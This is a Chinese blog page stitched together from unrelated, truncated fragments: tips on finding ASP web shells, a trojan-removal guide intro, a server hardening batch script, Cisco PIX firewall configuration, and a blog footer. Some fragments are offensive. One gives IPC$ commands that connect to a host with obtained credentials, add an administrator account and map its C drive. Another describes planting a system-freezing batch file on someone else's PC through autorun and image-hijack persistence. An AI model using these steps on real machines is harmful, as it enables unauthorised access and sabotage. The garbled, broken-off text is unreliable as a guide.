网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
一.技巧1:杀毒软件查杀
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
二.技巧2:FTP客户端对比
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点
经常看到有人求助~
为什么我的主页被改了,死活改不回来呀?
这个进程是不是正常进程呀?
这个程序是什么程序呀?为什么死活杀不掉呢?
.......
总有热心的版主、网友来要一份求助者的系统信息记录,来帮着分析解答。
但这肯定不是一个很好的办法,新问题在不断发生,解答问题的人即使不怕累,相信求助的人也都不好意思了。
本着“授之以鱼不如授之以渔!”的精神,偶决定开一个贴子专门教你怎么手工查杀流氓软件木马插件,让您由求助者变为救助者。
工欲善其事,必先利其器,手工查杀离不开有力的工具。
具体使用哪一个或哪几个,看个人习惯而定,只要能达到同样的目的就行。本贴中所用到的工具,会列出下载地址,以方便各位使用。
为了描述方便,对流氓软件、木马、广告插件等通一以“木马”来称呼,查杀方法不特别指出的,都适用于全部。
第一章是理论基础,让您了解一下木马的养成;第二章是动手基础,教您实际动手跟踪一下木马的工作过程,对木马有个切身的体会;
第三章,检测木马
对于企业用户来说,由于计算机的数量相对较多,而且往往具有多种不同的操作系统和应用程序,在病毒防护上的复杂程度相比单机用户要呈几何级数增长。所以对于企业用户群体来说,有一些特定的问题需要注意,也有一些特定的规则需要遵守。
ü
NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use
127.0.0.1ipc$ '123456'
/user:'hbx'
退出的命令是
net use
127.0.0.1ipc$ /delte
下面的*作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:127.0.0.1c$
建议在虚拟机上试验
或者在别人的电脑上运行改批处理
她可以让她的电脑立马无法响应过来
而不得不重启机器
如果你还毒的话可以把她放到启动项中
还毒的话加一个Autorun文件,open=这个批处理路径
再毒的话在注册表中镜像劫持掉,让她点击QQ、MSN、IE等常用工具既
激活批处理
让她折腾去
双核也测试过,只能重启,反映响应比以前简单的写个
loop循环还要强N倍
呵呵
还来不及敲shutdown -a
关闭组等操作哦
纯属娱乐
对系统文件无伤害
执行一个批处理文件一步到位的来设置服务器安全:
@echo off
echo '虚拟主机C盘权限设定'
echo 'Author:www.dreaminn.cn'
echo '删除C盘的everyone的权限'
cd/
cacls '%SystemDrive%' /r 'everyone' /e
cacls '%SystemRoot%' /r 'everyone' /e
cacls '%SystemRoot%/Registration' /r 'everyone' /e
cacls '%SystemDrive%/Documents and Settings' /r 'everyone' /e
echo '删除C盘的所有的users的访问权限'
cd/
cacls '%SystemDrive%' /r 'users' /e
cacls '%SystemDrive%/Program Files' /r 'users' /e
cacls '%SystemDrive%/Documents and Settings' /r 'users' /e
cacls '%SystemRoot%' /r 'users' /e
cacls '%SystemRoot%/addins' /r
(1)配置防火墙接口的名字,并指定安全级别(nameif)
Pix525(config)#nameif ethernet0 outside security0
Pix525(config)#nameif ethernet1 inside
security100
Pix525(config)#nameif dmz security50
提示:在缺省配置中,以太网0被命名为外部接口(outside),安全级别是0;以太网1被命名为内部接口(inside),安全级别是100.安全级别取值范围为1~99,数字越大安全级别越高。若添加新的接口,语句可以这样写:
Pix525(config)#nameif pix/intf3 security40 (安全级别任取)
(2)配置以太口参数(interface)
Pix525(config)#interface ethernet0 auto
(auto选项表明系统自适应网卡类型)
Pix525(config)#interface ethernet1 100full
(100full选项表示100Mbit/s以太网全双工通信)
Pix525(config)#interface ethernet1 100full
shutdown
(shutdown选项表示关闭这个接口,若启用接口去掉shutdown)
(3)配
我已经在新浪BLOG安家了,欢迎你“常过来看看”,大家多多交流哦。我们可以一起把这里变成共同的心灵家园,像家一样温暖的地方。
我会把一些新鲜有趣的东西记录下来一块与你分享,也希望你能够记住我的
BLOG地址,像老朋友一样经常过来做客——你可以把“她”添加到你的收藏夹中,也可以把“她”复制下来告诉你的朋友们。特别希望能通过你,让我认识更多的好朋友。如果还有不了解的,就跟着我一起来看看拥有所有博客知识和维护技巧的博客帮助站吧:
http://blog.sina.com.cn/lm/help/2008/index.html
:)
我的BLOG地址:
http://blog.sina.com.cn/kanbudaodeaia
加载中…
